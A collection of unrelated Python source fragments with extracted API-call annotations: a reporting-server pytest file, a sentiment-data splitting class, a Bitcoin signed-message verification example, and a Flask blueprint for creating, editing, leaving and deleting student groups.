assert reporting_server_with_config.xmlrpc_queuelist() == [], "Queuelen is not empty"
# Send post request
reporting_server_with_config.xmlrpc_post(*post_data1)
# Get queue list
assert reporting_server_with_config.xmlrpc_queuelist() == expected_queuelist
# Check if queuelen is 1
assert reporting_server_with_config.xmlrpc_queuelen() == 1, "Queuelen is not right"
# Call queuedropcmd and check queuelen
assert reporting_server_with_config.xmlrpc_queuedropcmd(0) == expected_queuelist[0]
assert reporting_server_with_config.xmlrpc_queuelen() == 0
def test_cmdproc(reporting_server_with_config):
"""Verify that operation with cmdproc is work.
"""
reporting_server_with_config.xmlrpc_cmdprocdisable()
assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is False and cmdproc is True", "Watchdog is False. cmdprocdisable doesn't work."
reporting_server_with_config.xmlrpc_cmdprocenable()
assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is True and cmdproc is True", "Watchdog is True. cmdprocdisable doesn't work."
|
[
"reporting.reporting_server.XMLReportingServer",
"os.path.dirname",
"pytest.fixture",
"reporting.reporting_server.imp_plugins"
] |
[((887, 907), 'reporting.reporting_server.XMLReportingServer', 'XMLReportingServer', ([], {}), '()\n', (905, 907), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((911, 957), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (925, 957), False, 'import pytest\n'), ((1599, 1645), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (1613, 1645), False, 'import pytest\n'), ((1372, 1392), 'reporting.reporting_server.XMLReportingServer', 'XMLReportingServer', ([], {}), '()\n', (1390, 1392), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((1522, 1544), 'reporting.reporting_server.imp_plugins', 'imp_plugins', (['"""reports"""'], {}), "('reports')\n", (1533, 1544), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((1549, 1574), 'reporting.reporting_server.imp_plugins', 'imp_plugins', (['"""connectors"""'], {}), "('connectors')\n", (1560, 1574), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((758, 783), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (773, 783), False, 'import os\n'), ((1468, 1493), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1483, 1493), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
data4models.py
# Sentiment Indentification for Roman Urdu
'''
import numpy as np
import pandas as pd
class Data:
# Constructor
def __init__( self, config ):
self.config = config
def split( self, df ):
'''
Split the (entire) data into training data & test data
'''
assert isinstance( df, pd.DataFrame), 'df must be a pandas.DataFrame.'
test_split_ratio = self.config.test_split_ratio
print(f'Data.preprocess.split: test_split_ratio= {test_split_ratio}' )
reviews = df['review']
sentiments = df['sentiment']
n_dataset = df.shape[0]
n_test = int( n_dataset * test_split_ratio ) # 0.7
n_training = n_dataset - n_test # 0.3
# Use indexcing to split the data.
index_data = np.arange( n_dataset )
index_training = np.random.choice( index_data, n_training, replace=False )
index_test = np.delete( index_data, index_training )
data_training_np = reviews.loc[ index_training ].values
data_test_np = reviews.loc[ index_test ].values
labels_training_np = sentiments.loc[ index_training ].values
labels_test_np = sentiments.loc[ index_test ].values
print(f' number of dataset =', n_dataset )
print(f' np.shape(x_train) =', np.shape(data_training_np) )
print(f' np.shape(y_train) =', np.shape(labels_training_np) )
print(f' np.shape(x_test) =', np.shape(data_test_np) )
print(f' np.shape(y_test) =', np.shape(labels_test_np) )
return data_training_np, labels_training_np, data_test_np, labels_test_np
# x_train, y_train, x_test, y_test
# def __init__( self, x, y, config ):
# self.config = config
# self.x = x # shape = (length, dimension)
# self.y = y # shape = (length,)
def split( self, split_rate=[0.7, 0.2, 0.1] ):
'''
The default ratio to split the training, evaluation, & test data is 7:2:1.
'''
print( 'split_rate = ', split_rate )
length, dimension = np.shape( self.x )
# Split the (entire) data into training data & test data
n_training = int( length * split_rate[0] ) # 0.7
n_evaluation = int( length * split_rate[1] ) # 0.2
n_test = length - n_training - n_evaluation
# Use indexcing to split the data.
index_data = np.arange( length ) # 13704, [0, length-1]
index_training = np.random.choice( index_data, n_training, replace=False ) # 9592
index_temp = np.delete( index_data, index_training ) # 4112
index_evaluation = np.random.choice( index_temp, n_evaluation ) # 2740
index_test = np.delete( index_temp, index_evaluation ) # 3547, This must be 1372!
data_training = self.x[ index_training, : ]
data_evaluation = self.x[ index_evaluation, : ]
data_test = self.x[ index_test, : ]
labels_training = self.y[ index_training ]
labels_evaluation = self.y[ index_evaluation ]
labels_test = self.y[ index_test ]
training = [data_training, labels_training]
evaluation = [data_evaluation, labels_evaluation]
test = [data_test, labels_test]
return training, evaluation, test
# #=====================================================================#
# # The above variables don't have the leading self. to improve readability.
# self.length = length # = size, or n_data
# self.dimension = dimension
#
# self.n_training = n_training
# self.n_test = n_test
def load(self, batch_size):
data_length = len( self.data_training )
if data_length >= batch_size:
# Because of replace=False,
# ValueError: Cannot take a larger sample than population when 'replace=False'
index = np.random.choice( data_length, batch_size, replace=False )
data = self.data_training[ index,: ]
labels = self.labels_training[ index ]
self.data_training = np.delete( self.data_training, index, axis=0 )
self.labels_training = np.delete( self.labels_training, index )
done = True
else: #data_length < batch_size:
self.data_training = self.x[ self.index_training ]
self.labels_training = self.y[ self.index_training ]
done = False
return data, labels, done
# EOF
|
[
"numpy.shape",
"numpy.arange",
"numpy.delete",
"numpy.random.choice"
] |
[((927, 947), 'numpy.arange', 'np.arange', (['n_dataset'], {}), '(n_dataset)\n', (936, 947), True, 'import numpy as np\n'), ((976, 1031), 'numpy.random.choice', 'np.random.choice', (['index_data', 'n_training'], {'replace': '(False)'}), '(index_data, n_training, replace=False)\n', (992, 1031), True, 'import numpy as np\n'), ((1060, 1097), 'numpy.delete', 'np.delete', (['index_data', 'index_training'], {}), '(index_data, index_training)\n', (1069, 1097), True, 'import numpy as np\n'), ((2284, 2300), 'numpy.shape', 'np.shape', (['self.x'], {}), '(self.x)\n', (2292, 2300), True, 'import numpy as np\n'), ((2630, 2647), 'numpy.arange', 'np.arange', (['length'], {}), '(length)\n', (2639, 2647), True, 'import numpy as np\n'), ((2702, 2757), 'numpy.random.choice', 'np.random.choice', (['index_data', 'n_training'], {'replace': '(False)'}), '(index_data, n_training, replace=False)\n', (2718, 2757), True, 'import numpy as np\n'), ((2796, 2833), 'numpy.delete', 'np.delete', (['index_data', 'index_training'], {}), '(index_data, index_training)\n', (2805, 2833), True, 'import numpy as np\n'), ((2882, 2924), 'numpy.random.choice', 'np.random.choice', (['index_temp', 'n_evaluation'], {}), '(index_temp, n_evaluation)\n', (2898, 2924), True, 'import numpy as np\n'), ((2962, 3001), 'numpy.delete', 'np.delete', (['index_temp', 'index_evaluation'], {}), '(index_temp, index_evaluation)\n', (2971, 3001), True, 'import numpy as np\n'), ((1488, 1514), 'numpy.shape', 'np.shape', (['data_training_np'], {}), '(data_training_np)\n', (1496, 1514), True, 'import numpy as np\n'), ((1558, 1586), 'numpy.shape', 'np.shape', (['labels_training_np'], {}), '(labels_training_np)\n', (1566, 1586), True, 'import numpy as np\n'), ((1630, 1652), 'numpy.shape', 'np.shape', (['data_test_np'], {}), '(data_test_np)\n', (1638, 1652), True, 'import numpy as np\n'), ((1696, 1720), 'numpy.shape', 'np.shape', (['labels_test_np'], {}), '(labels_test_np)\n', (1704, 1720), True, 'import numpy as np\n'), ((4261, 4317), 'numpy.random.choice', 'np.random.choice', (['data_length', 'batch_size'], {'replace': '(False)'}), '(data_length, batch_size, replace=False)\n', (4277, 4317), True, 'import numpy as np\n'), ((4475, 4519), 'numpy.delete', 'np.delete', (['self.data_training', 'index'], {'axis': '(0)'}), '(self.data_training, index, axis=0)\n', (4484, 4519), True, 'import numpy as np\n'), ((4558, 4596), 'numpy.delete', 'np.delete', (['self.labels_training', 'index'], {}), '(self.labels_training, index)\n', (4567, 4596), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 22:46:11 2018
"""
import BTC_P2PKH_sigvef as bv
# verifying two P2PKH Bitcoin signed messages
address = 'bitcoin:16vqGo3KRKE9kTsTZxKoJKLzwZGTodK3ce'
signature = ('HPDs1TesA48a9up4QORIuub67VHBM37X66skAYz0Esg23gdfMu'+
'CTYDFORc6XGpKZ2/flJ2h/DUF569FJxGoVZ50=')
message = 'test message'
bv.sig_vef_P2PKH(address, signature, message)
address2 = "<KEY>"
message2 = "test message"
signature2 = ("IPn9bbEdNUp6+bneZqE2YJbq9Hv5aNILq9E" +
"5eZoMSF3/fBX4zjeIN6fpXfGSGPrZyKfHQ/c/kTSP+NIwmyTzMfk=")
bv.sig_vef_P2PKH(address2, signature2, message2)
|
[
"BTC_P2PKH_sigvef.sig_vef_P2PKH"
] |
[((344, 389), 'BTC_P2PKH_sigvef.sig_vef_P2PKH', 'bv.sig_vef_P2PKH', (['address', 'signature', 'message'], {}), '(address, signature, message)\n', (360, 389), True, 'import BTC_P2PKH_sigvef as bv\n'), ((561, 609), 'BTC_P2PKH_sigvef.sig_vef_P2PKH', 'bv.sig_vef_P2PKH', (['address2', 'signature2', 'message2'], {}), '(address2, signature2, message2)\n', (577, 609), True, 'import BTC_P2PKH_sigvef as bv\n')]
|
'''
basic blueprint routes for interacting with an AG
'''
# import third party modules
import re
from flask import Blueprint, request, jsonify, g, url_for, flash, redirect
from sqlalchemy.sql import exists, and_
from werkzeug.exceptions import BadRequest, PreconditionFailed
# import database instance
from app.models import db
# import app with config etc.
from app import app
# import database models
from app.models.ag import AG, AGSchema, AGSchemaIntern
from app.models.associations import UserAG
# import utilities
from app.util import requires_auth
from app.util.assocations import requires_mentor, requires_member_association
from app.util.ag import requires_ag
from app.util.user import get_user_by_username
# import additional blueprints regarding applications, invitations and messages of ags
from app.blueprints.api.v1.ag import applications, invitations, messages
# import regex config for creating an ag
from config.regex import AGRegex
# declare the blueprint variable for this blueprint
bp = Blueprint('ag_api', __name__)
# register the additional blueprints
app.register_blueprint(invitations.bp, url_prefix='/invitations')
app.register_blueprint(applications.bp, url_prefix='/applications')
app.register_blueprint(messages.bp, url_prefix='/messages')
#declare the needed marshmallow schemas
ag_schema_intern = AGSchemaIntern()
ag_schema = AGSchema()
ags_schema = AGSchema(many=True)
@bp.route('/', methods=['POST'])
# check that the requester is authenticated/logined
@requires_auth()
def add_ag():
'''
Create a new AG. The request body has to include the following:
:key: name: AG name used to identify the ag (eg. /ag/<name>)
:key: display_name: AG name that is human read able
(can contain spaces etc.)
:key: description: A description of the AG
:return: If everything went as it should, the newly created AG is
returned.
'''
# read request values
name = request.values.get('name')
display_name = request.values.get('display_name')
description = request.values.get('description')
# check that the ag name and displayname is not used before and
# check that the values match the regex pattern
# if something isn't right return a error message
if db.session.query(exists().where(AG.name == name)).scalar() or not bool(
re.match(AGRegex.name, name)):
return jsonify({'reason': 'name'}), 400
if db.session.query(exists().where(AG.display_name == display_name)).scalar() or not bool(
re.match(AGRegex.display_name, display_name)):
return jsonify({'reason': 'display_name'}), 400
if not bool(re.match(AGRegex.description, description)):
return jsonify({'reason': 'description'}), 400
# create a new database AG entry
ag: AG = AG()
ag.name = name
ag.display_name = display_name
ag.description = description
ag.color = request.values.get('color', default='primary')
# Add the AG entry to the DB to create a new id
db.session.add(ag)
db.session.flush()
# Create the association entry to the creating user, so he is added as mentor
user_ag = UserAG()
user_ag.user_id = g.session.user_id
user_ag.ag_id = ag.id
user_ag.status = 'ACTIVE'
user_ag.role = 'MENTOR'
# add the association entry and save the database changes
db.session.add(user_ag)
db.session.commit()
# return a success message
return jsonify({'status': 'success', 'redirect': url_for('ag.invite_ag', ag_name=ag.name)}), 200
@bp.route('/id/<ag_id>', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the ag with the ag_id exist and add it to the params/kwargs
@requires_ag()
def get_ag_by_id(ag_id, ag):
'''
Query an AG specified by its id
:param ag_id: A specific id
:return: JSON representation of the AG
'''
# if the requester is a member of the ag --> return the schema for a member
# else --> return the schema for a foreign
if db.session.query(exists().where(UserAG.user_id == g.session.user_id and \
UserAG.ag_id == ag_id)).scalar():
return ag_schema_intern.jsonify(ag), 200
else:
return ag_schema.jsonify(ag), 200
@bp.route('/name/<ag_name>', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the ag with the ag_name exist and add it to the params/kwargs
@requires_ag()
def get_ag_by_name(ag_name, ag):
'''
Query an AG specified by its unique name
:param name: A specific AG name
:return: JSON representation of the AG
'''
# if the requester is a member of the ag --> return the schema for a member
# else --> return the schema for a foreign
if db.session.query(exists().where(UserAG.user_id == g.session.user_id and \
UserAG.ag_id == ag.id)).scalar():
return ag_schema_intern.jsonify(ag), 200
else:
return ag_schema.jsonify(ag), 200
@bp.route('/<ag_id>', methods=['PUT'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def change_ag_values(ag_id, ag, user_ag):
'''
Change values of an AG.
The request body may include the following:
:key: display_name: String with new display_name
:key: description: String with new description
:param ag_id: AG id for which ag the provided values should be changed
:return:
'''
# read the request vaalues
display_name = request.values.get('display_name', default=None)
description = request.values.get('description', default=None)
value_changed = False
# checks if the display_name or description got transmitted
# if so update the ag entry
if display_name is not None and bool(re.match(AGRegex.display_name, display_name)):
ag.display_name = display_name
value_changed = True
if description is not None and bool(re.match(AGRegex.description, description)):
ag.description = description
value_changed = True
# if some value got changed, merge the entry to the database and return a success message
if value_changed:
db.session.merge(ag)
db.session.commit()
return jsonify({'status': 'success'}), 200
# else return a BadRequest message
else:
return BadRequest()
@bp.route('/', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
def get_all_ags():
'''
Query up to 20 ags
The request body may include the following:
:key: count: Int with the count how much ags to return
--> if greater than 20, it will be set to 20
:default: 5
:key: offset: Int how many entries to skip
:default: 0
:return: JSON Representation of the AGs
'''
# read request params and set default if not set
count = request.args.get('count', default=5, type=int)
offset = request.args.get('offset', default=0, type=int)
# adjust to a max of 20
if count > 20:
count = 20
# query all ags (with limit and offset)
all_ags = AG.query.offset(offset).limit(count).all()
# return a json representation
return ags_schema.jsonify(all_ags)
@bp.route('<ag_name>/submit_setting', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def update_users(ag_name, user_ag, ag):
'''
Update the roles of users in an ag
The Request body includes following:
:key: <user_id>: unique database id of the user
--> :value: <role> --> 'MENTOR' or 'PARTICIPIANT'
:param ag_name: ag_name of the ag to be edited
automatic filled params
:param user_ag: database entry of the association bewteen the request user and the ag
--> get filled by @requires_mentor
:param ag: database entry of the ag
--> get filled by @requires_mentor
:return: redirect to the ag dashboard
'''
# for every key in rquest values --> for every user/user_id passed by the form
for user_id in request.values:
# the role the user got assigned to be
role = request.values.get(user_id)
# query the database entry of the association between the user to be edited an the ag
edit_user_ag = db.session.query(UserAG).filter(and_(UserAG.user_id == user_id,\
UserAG.ag_id == ag.id)).scalar()
# if there is an result for this user <==> the user is in the ag
if edit_user_ag:
# update his role and simulate the changes
edit_user_ag.role = role
db.session.flush()
# if there are no mentors left
if not ag.mentors:
# throw error
flash(u'An AG needs a minimum of one Mentor', 'error')
return redirect(url_for('ag.ag_settings', ag_name=ag_name))
# if there are still mentors
# --> save changes to the database and redirect to the ag dashboard
db.session.commit()
flash(f'Successfully changed the roles in {ag.display_name}', 'success')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
@bp.route('<ag_name>/leave')
# check that the requester is authenticated/logined
@requires_auth()
# check if the requester has a association to the ag
# add the association and the ag to the params/kwargs
@requires_member_association()
def leave_ag(ag_name, ag, user_ag):
'''
leave the specified ag
:param ag_name: name of the ag to leave
automatic filled params
:param user_ag: database entry of the association bewteen the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
# if the user is not a actual user of the ag
# return a error message
if user_ag.role == 'NONE':
flash('You cannot leave an AG you are not in', 'error')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else: update the entry, so the user is no member anymore and left the ag
user_ag.role = 'NONE'
user_ag.status = 'LEFT'
# simulate the changes
db.session.flush()
# if there are no members left in the ag
if not ag.actual_users:
# delete the ag
db.session.delete(ag)
db.session.flush()
# save a success message
flash(f'You sucessfully left and deleted the AG {ag.name}', 'success')
# else if there are no mentors left, but still members
elif not ag.mentors:
# return a error message
# dont save the changes to the database and return to the ag dashboard
flash(f'You cannot leave an AG, when there is no Mentor left afterwards', 'error')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else
else:
# save a success message
flash(f'You sucessfully left the AG {ag.name}', 'success')
# save the cganges to the database and return with the saved success message to the dashboard
db.session.commit()
return redirect(url_for('index'))
@bp.route('<ag_name>/kick/<user_name>')
# check that the requester is authenticated/logined
@requires_auth()
# check
@requires_mentor()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def kick_user(ag_name, user_name, ag, user_ag):
'''
kick a user out of an ag
:param ag_name: name of the ag to kick the user out
:param user_name: username of the user to be kicked out
automatic filled params
:param user_ag: database entry of the association bewteen the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
# query the user and his associatin
user = get_user_by_username(user_name)
edit_user_ag = db.session.query(UserAG).filter_by(user_id=user.id, ag_id=ag.id).scalar()
# if the user is not an actual user
if edit_user_ag is None or edit_user_ag.role == 'NONE':
# return to the ag dashboard with a error message
flash(f'You cannot kick {user.username} from {ag.display_name}.')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else
# change the association entry, so the user is not a member of the ag anymore
# and his status is kicked
edit_user_ag.role = 'NONE'
edit_user_ag.status = 'KICKED'
# simulate the changes
db.session.flush()
# if there are no members left
if not ag.actual_users:
# delete the ag and return to the dashboard
db.session.delete(ag)
db.session.commit()
flash(f'You sucessfully left and deleted the AG {ag.display_name}', 'success')
return redirect(url_for('index'))
# else if there are no mentors left
elif not ag.mentors:
# save a error message
flash(f'You cannot kick the last Mentor of {ag.display_name}', 'error')
# else
else:
# save a success message and save the changes to the database
flash(f'You sucessfully kicked {user.username} from the AG {ag.display_name}', 'success')
db.session.commit()
# return to the ag dashboard
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
@bp.route('<ag_name>/delete')
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def delete_ag(ag_name, ag, user_ag):
'''
delete an ag
:param ag_name: name of the ag to be deleted
automatic filled params
:param user_ag: database entry of the association bewteen the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
# delete the ag
db.session.delete(ag)
# save the changes
db.session.commit()
# return to the dashboard with a success message
flash(f'You successfully deleted the AG {ag.display_name}', 'success')
return redirect(url_for('index'))
|
[
"flask.flash",
"werkzeug.exceptions.BadRequest",
"sqlalchemy.sql.and_",
"app.util.assocations.requires_mentor",
"flask.url_for",
"flask.jsonify",
"app.models.db.session.commit",
"app.util.assocations.requires_member_association",
"flask.request.args.get",
"app.models.db.session.query",
"app.app.register_blueprint",
"app.models.db.session.delete",
"app.models.db.session.flush",
"app.models.associations.UserAG",
"app.models.ag.AGSchemaIntern",
"flask.Blueprint",
"app.util.ag.requires_ag",
"sqlalchemy.sql.exists",
"app.models.ag.AG",
"flask.request.values.get",
"app.models.db.session.merge",
"re.match",
"app.util.requires_auth",
"app.models.ag.AG.query.offset",
"app.util.user.get_user_by_username",
"app.models.ag.AGSchema",
"app.models.db.session.add"
] |
[((1014, 1043), 'flask.Blueprint', 'Blueprint', (['"""ag_api"""', '__name__'], {}), "('ag_api', __name__)\n", (1023, 1043), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((1082, 1147), 'app.app.register_blueprint', 'app.register_blueprint', (['invitations.bp'], {'url_prefix': '"""/invitations"""'}), "(invitations.bp, url_prefix='/invitations')\n", (1104, 1147), False, 'from app import app\n'), ((1148, 1215), 'app.app.register_blueprint', 'app.register_blueprint', (['applications.bp'], {'url_prefix': '"""/applications"""'}), "(applications.bp, url_prefix='/applications')\n", (1170, 1215), False, 'from app import app\n'), ((1216, 1275), 'app.app.register_blueprint', 'app.register_blueprint', (['messages.bp'], {'url_prefix': '"""/messages"""'}), "(messages.bp, url_prefix='/messages')\n", (1238, 1275), False, 'from app import app\n'), ((1336, 1352), 'app.models.ag.AGSchemaIntern', 'AGSchemaIntern', ([], {}), '()\n', (1350, 1352), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1365, 1375), 'app.models.ag.AGSchema', 'AGSchema', ([], {}), '()\n', (1373, 1375), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1389, 1408), 'app.models.ag.AGSchema', 'AGSchema', ([], {'many': '(True)'}), '(many=True)\n', (1397, 1408), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1496, 1511), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (1509, 1511), False, 'from app.util import requires_auth\n'), ((3629, 3644), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (3642, 3644), False, 'from app.util import requires_auth\n'), ((3719, 3732), 'app.util.ag.requires_ag', 'requires_ag', ([], {}), '()\n', (3730, 3732), False, 'from app.util.ag import requires_ag\n'), ((4344, 4359), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (4357, 4359), False, 'from app.util import requires_auth\n'), ((4436, 4449), 'app.util.ag.requires_ag', 'requires_ag', ([], {}), '()\n', (4447, 4449), False, 'from app.util.ag import requires_ag\n'), ((5073, 5088), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (5086, 5088), False, 'from app.util import requires_auth\n'), ((5201, 5218), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (5216, 5218), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((6538, 6553), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (6551, 6553), False, 'from app.util import requires_auth\n'), ((7447, 7462), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (7460, 7462), False, 'from app.util import requires_auth\n'), ((7575, 7592), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (7590, 7592), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((9442, 9457), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (9455, 9457), False, 'from app.util import requires_auth\n'), ((9566, 9595), 'app.util.assocations.requires_member_association', 'requires_member_association', ([], {}), '()\n', (9593, 9595), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((11471, 11486), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (11484, 11486), False, 'from app.util import requires_auth\n'), ((11496, 11513), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (11511, 11513), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((11626, 11643), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (11641, 11643), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((13775, 13790), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (13788, 13790), False, 'from app.util import requires_auth\n'), ((13903, 13920), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (13918, 13920), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((1946, 1972), 'flask.request.values.get', 'request.values.get', (['"""name"""'], {}), "('name')\n", (1964, 1972), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((1992, 2026), 'flask.request.values.get', 'request.values.get', (['"""display_name"""'], {}), "('display_name')\n", (2010, 2026), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2045, 2078), 'flask.request.values.get', 'request.values.get', (['"""description"""'], {}), "('description')\n", (2063, 2078), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2801, 2805), 'app.models.ag.AG', 'AG', ([], {}), '()\n', (2803, 2805), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((2908, 2954), 'flask.request.values.get', 'request.values.get', (['"""color"""'], {'default': '"""primary"""'}), "('color', default='primary')\n", (2926, 2954), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((3012, 3030), 'app.models.db.session.add', 'db.session.add', (['ag'], {}), '(ag)\n', (3026, 3030), False, 'from app.models import db\n'), ((3035, 3053), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (3051, 3053), False, 'from app.models import db\n'), ((3151, 3159), 'app.models.associations.UserAG', 'UserAG', ([], {}), '()\n', (3157, 3159), False, 'from app.models.associations import UserAG\n'), ((3351, 3374), 'app.models.db.session.add', 'db.session.add', (['user_ag'], {}), '(user_ag)\n', (3365, 3374), False, 'from app.models import db\n'), ((3379, 3398), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3396, 3398), False, 'from app.models import db\n'), ((5604, 5652), 'flask.request.values.get', 'request.values.get', (['"""display_name"""'], {'default': 'None'}), "('display_name', default=None)\n", (5622, 5652), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((5671, 5718), 'flask.request.values.get', 'request.values.get', (['"""description"""'], {'default': 'None'}), "('description', default=None)\n", (5689, 5718), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((6988, 7034), 'flask.request.args.get', 'request.args.get', (['"""count"""'], {'default': '(5)', 'type': 'int'}), "('count', default=5, type=int)\n", (7004, 7034), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((7048, 7095), 'flask.request.args.get', 'request.args.get', (['"""offset"""'], {'default': '(0)', 'type': 'int'}), "('offset', default=0, type=int)\n", (7064, 7095), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((9195, 9214), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (9212, 9214), False, 'from app.models import db\n'), ((9219, 9291), 'flask.flash', 'flash', (['f"""Successfully changed the roles in {ag.display_name}"""', '"""success"""'], {}), "(f'Successfully changed the roles in {ag.display_name}', 'success')\n", (9224, 9291), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10453, 10471), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (10469, 10471), False, 'from app.models import db\n'), ((11317, 11336), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (11334, 11336), False, 'from app.models import db\n'), ((12232, 12263), 'app.util.user.get_user_by_username', 'get_user_by_username', (['user_name'], {}), '(user_name)\n', (12252, 12263), False, 'from app.util.user import get_user_by_username\n'), ((12879, 12897), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (12895, 12897), False, 'from app.models import db\n'), ((14391, 14412), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (14408, 14412), False, 'from app.models import db\n'), ((14440, 14459), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (14457, 14459), False, 'from app.models import db\n'), ((14517, 14587), 'flask.flash', 'flash', (['f"""You successfully deleted the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You successfully deleted the AG {ag.display_name}', 'success')\n", (14522, 14587), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((6275, 6295), 'app.models.db.session.merge', 'db.session.merge', (['ag'], {}), '(ag)\n', (6291, 6295), False, 'from app.models import db\n'), ((6304, 6323), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6321, 6323), False, 'from app.models import db\n'), ((6439, 6451), 'werkzeug.exceptions.BadRequest', 'BadRequest', ([], {}), '()\n', (6449, 6451), False, 'from werkzeug.exceptions import BadRequest, PreconditionFailed\n'), ((8387, 8414), 'flask.request.values.get', 'request.values.get', (['user_id'], {}), '(user_id)\n', (8405, 8414), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((8963, 9017), 'flask.flash', 'flash', (['u"""An AG needs a minimum of one Mentor"""', '"""error"""'], {}), "(u'An AG needs a minimum of one Mentor', 'error')\n", (8968, 9017), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((9312, 9355), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (9319, 9355), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10164, 10219), 'flask.flash', 'flash', (['"""You cannot leave an AG you are not in"""', '"""error"""'], {}), "('You cannot leave an AG you are not in', 'error')\n", (10169, 10219), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10577, 10598), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (10594, 10598), False, 'from app.models import db\n'), ((10607, 10625), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (10623, 10625), False, 'from app.models import db\n'), ((10667, 10737), 'flask.flash', 'flash', (['f"""You sucessfully left and deleted the AG {ag.name}"""', '"""success"""'], {}), "(f'You sucessfully left and deleted the AG {ag.name}', 'success')\n", (10672, 10737), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11357, 11373), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", 